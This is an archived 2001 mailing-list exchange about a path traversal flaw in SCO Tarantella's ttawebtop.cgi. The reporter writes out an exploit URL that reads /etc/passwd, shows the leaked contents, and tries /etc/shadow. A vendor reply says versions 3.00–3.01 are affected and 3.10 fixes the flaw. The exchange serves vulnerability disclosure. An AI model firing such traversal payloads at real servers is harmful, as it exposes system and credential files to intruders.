On Monday June 18, KF wrote: > SCO has been notified of this issue. > > > -------- Original Message -------- > Subject: SCO Tarantella Remote file read via ttawebtop.cgi > Date: Mon, 18 Jun 2001 13:06:41 -0400 > From: KF <dotslashat_private> > To: reconat_private > > > http://xxx/tarantella/cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/passwd > > root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin: > daemon:x:2:2:daemon:/sbin: adm:x:3:4:adm:/var/adm: > lp:x:4:7:lp:/var/spool/lpd: sync:x:5:0:sync:/sbin:/bin/sync > shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown > halt:x:7:0:halt:/sbin:/sbin/ > ... > > > No perms to shadow... > > http://xxx/tarantella/cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/shadow > > > File missing > > The following file could not be found: > > > /tarantella/../../../../../../../../../../../../../../../etc/shadow > > Please give this information to a Tarantella Administrator. > > -KF This problem was introduced in release 3.01 and was caught during a security audit and was fixed for our last release (Tarantella 3.10). It is a problem for releases 3.00 and 3.01 only. To fix this problem upgrade to 3.10. Thank you for reporting this problem. - Mike McEwen
This archive was generated by hypermail 2b30 : Tue Jun 19 2001 - 13:10:40 PDT